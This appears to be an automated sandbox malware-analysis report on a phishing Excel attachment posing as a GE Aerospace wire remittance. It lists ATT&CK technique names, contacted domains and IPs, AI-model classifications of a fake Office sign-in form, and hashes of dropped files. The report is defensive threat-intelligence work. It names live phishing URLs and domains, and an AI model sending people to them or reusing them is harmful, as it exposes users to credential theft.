Registry Run Keys / Startup Folder
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
GE AEROSPACE _WIRE REMITTANCE.xlsx3%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
d3djdih2k2vfi2.cloudfront.net0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
dualstack.awseb-awseb-147jj8pq9oolw-1566203385.us-east-1.elb.amazonaws.com
23.21.254.193
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      d3djdih2k2vfi2.cloudfront.net
      18.245.33.146
      truefalseunknown
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        geolocation-db.com
        159.89.102.253
        truefalse
          high
          adi.actinkaeophl.com
          188.114.96.3
          truefalse
            unknown
            sso-dbbfec7f.sso.duosecurity.com
            52.223.1.163
            truefalse
              unknown
              ux-asset-commercial.duosecurity.com
              18.66.102.5
              truefalse
                unknown
                code.jquery.com
                151.101.2.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    high
                    yywinjs4bgrxgjy0hoc2skhhgd2kzofulsv3kqb6aqgdv3uks5i1bf5jrct.pafcoedru.com
                    188.114.96.3
                    truefalse
                      unknown
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        high
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          high
                          www.google.com
                          142.250.186.164
                          truefalse
                            high
                            questionscout-form-api-prod.us-east-1.elasticbeanstalk.com
                            35.172.59.191
                            truefalse
                              unknown
                              form.questionscout.com
                              unknown
                              unknownfalse
                                high
                                word.office.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.microsoft365.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    aadcdn.msftauth.net
                                    unknown
                                    unknownfalse
                                      high
                                      formapi.questionscout.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        cisco.login.duosecurity.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          identity.nel.measure.office.net
                                          unknown
                                          unknownfalse
                                            high
                                            login.microsoftonline.com
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              https://form.questionscout.com/672e80213f65b48c054fd942true
                                                unknown
                                                https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707false
                                                  unknown
                                                  https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                    unknown
                                                    https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37false
                                                      unknown
                                                      https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                        unknown
                                                        https://adi.actinkaeophl.com/tOaA22/false
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          13.107.6.156
                                                          unknownUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          2.19.244.127
                                                          unknownEuropean Union
                                                          16625AKAMAI-ASUSfalse
                                                          18.245.33.206
                                                          unknownUnited States
                                                          16509AMAZON-02USfalse
                                                          18.66.102.12
                                                          unknownUnited States
                                                          3MIT-GATEWAYSUSfalse
                                                          52.223.1.163
                                                          sso-dbbfec7f.sso.duosecurity.comUnited States
                                                          8987AMAZONEXPANSIONGBfalse
                                                          216.58.206.74
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          13.107.246.45
                                                          s-part-0017.t-0009.t-msedge.netUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.109.89.18
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          18.245.33.146
                                                          d3djdih2k2vfi2.cloudfront.netUnited States
                                                          16509AMAZON-02USfalse
                                                          216.58.206.78
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.18.94.41
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          18.66.102.5
                                                          ux-asset-commercial.duosecurity.comUnited States
                                                          3MIT-GATEWAYSUSfalse
                                                          142.250.181.234
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          74.125.206.84
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          35.172.59.191
                                                          questionscout-form-api-prod.us-east-1.elasticbeanstalk.comUnited States
                                                          14618AMAZON-AESUSfalse
                                                          142.250.65.238
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          2.19.126.143
                                                          unknownEuropean Union
                                                          16625AKAMAI-ASUSfalse
                                                          142.250.186.131
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          23.21.254.193
                                                          dualstack.awseb-awseb-147jj8pq9oolw-1566203385.us-east-1.elb.amazonaws.comUnited States
                                                          14618AMAZON-AESUSfalse
                                                          35.190.80.1
                                                          a.nel.cloudflare.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.186.74
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          52.113.194.132
                                                          unknownUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          104.17.24.14
                                                          cdnjs.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          40.126.32.133
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.182.143.208
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          1.1.1.1
                                                          unknownAustralia
                                                          13335CLOUDFLARENETUSfalse
                                                          104.18.95.41
                                                          challenges.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          216.58.206.42
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          159.89.102.253
                                                          geolocation-db.comUnited States
                                                          14061DIGITALOCEAN-ASNUSfalse
                                                          151.101.2.137
                                                          code.jquery.comUnited States
                                                          54113FASTLYUSfalse
                                                          142.250.186.106
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.181.227
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          20.190.159.4
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          40.126.31.73
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
                                                          142.250.185.174
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.131
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          20.190.159.0
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          44.209.66.48
                                                          unknownUnited States
                                                          14618AMAZON-AESUSfalse
                                                          188.114.96.3
                                                          adi.actinkaeophl.comEuropean Union
                                                          13335CLOUDFLARENETUSfalse
                                                          142.250.186.164
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          152.199.21.175
                                                          sni1gl.wpc.omegacdn.netUnited States
                                                          15133EDGECASTUSfalse
                                                          35.71.186.151
                                                          unknownUnited States
                                                          237MERIT-AS-14USfalse
                                                          54.167.120.151
                                                          unknownUnited States
                                                          14618AMAZON-AESUSfalse
                                                          IP
                                                          192.168.2.16
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1553460
                                                          Start date and time:2024-11-11 09:02:12 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • EGA enabled
                                                          Analysis Mode:stream
                                                          Analysis stop reason:Timeout
                                                          Sample name:GE AEROSPACE _WIRE REMITTANCE.xlsx
                                                          Detection:MAL
                                                          Classification:mal56.phis.winXLSX@24/63@66/304
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .xlsx
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 52.109.89.18, 2.19.244.127, 52.113.194.132, 184.28.90.27
                                                          • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, s-0005-office.config.skype.com, ecs-office.s-0005.s-msedge.net, s-0005.s-msedge.net, config.officeapps.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, prod.fs.microsoft.com.akadns.net, europe.configsvc1.live.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: formapi.questionscout.com
                                                          • VT rate limit hit for: questionscout-form-api-prod.us-east-1.elasticbeanstalk.com
                                                          InputOutput
                                                          URL: https://form.questionscout.com/672e80213f65b48c054fd942 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "EMAIL",
                                                            "prominent_button_name": "SIGN IN",
                                                            "text_input_field_labels": [
                                                              "EMAIL",
                                                              "PASSWORD"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: Model: claude-3-5-sonnet-latest
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": false,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": true
                                                          }
                                                          URL: URL: https://form.questionscout.com
                                                          URL: https://form.questionscout.com/672e80213f65b48c054fd942 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft Office"
                                                            ]
                                                          }
                                                          URL: https://form.questionscout.com/672e80213f65b48c054fd942 Model: gpt-4o
                                                          ```json{  "legit_domain": "office.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft Office' is well-known and typically associated with the domain 'office.com' or 'microsoft.com'.",    "The URL 'form.questionscout.com' does not match the legitimate domain for Microsoft Office.",    "The domain 'questionscout.com' is not associated with Microsoft Office and appears to be a third-party service.",    "The presence of input fields for EMAIL and PASSWORD on a non-Microsoft domain is suspicious and indicative of a phishing attempt."  ],  "riskscore": 9}
                                                          Google indexed: False
                                                          URL: form.questionscout.com
                                                                      Brands: Microsoft Office
                                                                      Input Fields: EMAIL, PASSWORD
                                                          URL: https://adi.actinkaeophl.com/tOaA22/ Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Performing browser verification to ensure your safety.",
                                                            "prominent_button_name": "unknown",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": true,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://form.questionscout.com/672e80213f65b48c054fd942 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "EMAIL",
                                                            "prominent_button_name": "SIGN IN",
                                                            "text_input_field_labels": [
                                                              "EMAIL",
                                                              "PASSWORD"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://adi.actinkaeophl.com/tOaA22/ Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Cloudflare"
                                                            ]
                                                          }
                                                          URL: Model: claude-3-5-sonnet-latest
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": false,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": true
                                                          }
                                                          URL: URL: https://adi.actinkaeophl.com
                                                          URL: https://form.questionscout.com/672e80213f65b48c054fd942 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft Office"
                                                            ]
                                                          }
                                                          URL: https://adi.actinkaeophl.com/tOaA22/ Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Performing browser verification to ensure your safety.",
                                                            "prominent_button_name": "unknown",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://adi.actinkaeophl.com/tOaA22/ Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Cloudflare"
                                                            ]
                                                          }
                                                          URL: Model: claude-3-5-sonnet-latest
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: URL: https://login.microsoftonline.com
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Sign in",
                                                            "prominent_button_name": "Next",
                                                            "text_input_field_labels": [
                                                              "Email, phone, or Skype"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Single Sign-On",
                                                            "prominent_button_name": "Next",
                                                            "text_input_field_labels": [
                                                              "Email Address"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: Model: claude-3-5-sonnet-latest
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": true
                                                          }
                                                          URL: URL: https://cisco.login.duosecurity.com
                                                          URL: https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Cisco"
                                                            ]
                                                          }
                                                          URL: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Single Sign-On",
                                                            "prominent_button_name": "Log in",
                                                            "text_input_field_labels": [
                                                              "john.smith@cisco.com",
                                                              "Password"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Cisco"
                                                            ]
                                                          }
                                                          URL: https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37 Model: gpt-4o
                                                          ```json{  "legit_domain": "cisco.com",  "classification": "wellknown",  "reasons": [    "Cisco is a well-known brand with a strong online presence.",    "The URL 'cisco.login.duosecurity.com' includes 'cisco' as a subdomain, which is a common practice for third-party authentication services.",    "Duo Security is a legitimate service provider known for providing two-factor authentication solutions, often used by enterprises like Cisco.",    "The domain 'duosecurity.com' is the legitimate domain for Duo Security, which is a trusted service provider.",    "The presence of 'cisco' as a subdomain suggests a legitimate integration with Duo Security's authentication services."  ],  "riskscore": 2}
                                                          URL: cisco.login.duosecurity.com
                                                                      Brands: Cisco
                                                                      Input Fields: Email Address
                                                          URL: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707 Model: gpt-4o
                                                          ```json{  "legit_domain": "cisco.com",  "classification": "wellknown",  "reasons": [    "Cisco is a well-known brand in the technology and networking industry.",    "The URL 'cisco.login.duosecurity.com' includes 'cisco' as a subdomain, which is a common practice for third-party authentication services.",    "Duo Security is a legitimate multi-factor authentication service provider, often used by enterprises like Cisco.",    "The domain 'duosecurity.com' is the legitimate domain for Duo Security, which is known to provide authentication services for various companies.",    "The presence of 'cisco' as a subdomain suggests a legitimate use case where Cisco is utilizing Duo Security for authentication."  ],  "riskscore": 2}
                                                          URL: cisco.login.duosecurity.com
                                                                      Brands: Cisco
                                                                      Input Fields: john.smith@cisco.com, Password
                                                          URL: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Single Sign-On",
                                                            "prominent_button_name": "Log in",
                                                            "text_input_field_labels": [
                                                              "john.smith@cisco.com",
                                                              "Password"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707 Model: claude-3-haiku-20240307
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Cisco"
                                                            ]
                                                          }
                                                          URL: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707 Model: gpt-4o
                                                          ```json{  "legit_domain": "cisco.com",  "classification": "wellknown",  "reasons": [    "The brand 'Cisco' is a well-known technology company.",    "The URL 'cisco.login.duosecurity.com' includes 'duosecurity.com', which is a legitimate domain associated with Duo Security, a company that provides two-factor authentication services and is owned by Cisco.",    "The subdomain 'cisco.login' suggests a login page for Cisco users, which is consistent with the use of Duo Security for authentication.",    "The email input field 'john.smith@cisco.com' indicates a Cisco employee login, which aligns with the use of Duo Security for secure access."  ],  "riskscore": 2}
                                                          URL: cisco.login.duosecurity.com
                                                                      Brands: Cisco
                                                                      Input Fields: john.smith@cisco.com, Password
                                                          URL: Model: claude-3-5-sonnet-latest
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: URL: https://duosecurity.com
                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                          File Type:PNG image data, 702 x 887, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):118521
                                                          Entropy (8bit):7.957751350520974
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:96BEF348693576CF0AF85AD7394058B4
                                                          SHA1:FC6B86FCF8B43EC699BDFC90262CDE1D612D9BF6
                                                          SHA-256:56D480F963A5B9258A6A7BB2A1A8E55A58ABAC053A20C2424CD2016EAF43F472
                                                          SHA-512:AE72CCFCFF2796F6C7909E88DCEDEBBD7EBB2802220C2AA301687D50A79185EBC9873803E82C88EEDE6B81B67996AA4F59DC17F3B74F1D6C831BC00E4889DBDC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.PNG........IHDR.......w.......Y... .IDATx..}.k$I..3..3....1.a...c..x..L.:.k....0."~. .h.6D.NS.!.6D!C.2.)C.2...A.)(..%.@2.gdD..7.#.#S...N.*.?N.<q..Q....@ ......... .....@ ...._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ....._...@ ......H..|.JTv....B..Wj.^..?....C..........8..I....V.+.X.Tv...d.....Lg..Rg..7"..M.S5.M..n...E~.....'Z.h.E..-kK...^>.......7..*.L.t6U.M.6U.l..F..|....8..Z-..+..0..........~..d2|...L......t6..[. ..1.....2Q.$U.y....+{..E..-Z.h.n.}x.I..\+..]f.or.....p..F.."....s]..".Nf``````...+..C...j.\...BMo.P|k..oDp.7.g..{O...-W........_4....+Q.]...J....oY..F......kNJ3.1.>0000000......Q|..6....=.M._s2w...........n...|..U.....oE..F...]...G.S.{n.........~....k.:@..
                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):2560
                                                          Entropy (8bit):1.9717872301369272
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F4C777326F0B7F52CA944387237220E8
                                                          SHA1:75CC8A8E4424B934675D71384AB59E59BA9560E7
                                                          SHA-256:7F4AADB26A1DE9423662EC8220F042F942F977555B2B4E2ABD69C2A904C07E20
                                                          SHA-512:07C7F2A2DA81B0A65A131BA157E7B36FCC5045A4C6206B63F4E1B1B258EFA386A0305ED6447E55C7E69B96BB13A917B1B4929B4F74A038BDDC038EC90BCAFFF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 07:03:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2673
                                                          Entropy (8bit):3.979030814697099
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1611412C8A43EAF432FE58998BBBABEE
                                                          SHA1:1FE8333EC2AC8096663A5569E0A9EFF63548E30C
                                                          SHA-256:F8A13EEB28913635AFE77F77A1D92AC368B5B327A69E4F862EE867F7F0E29A74
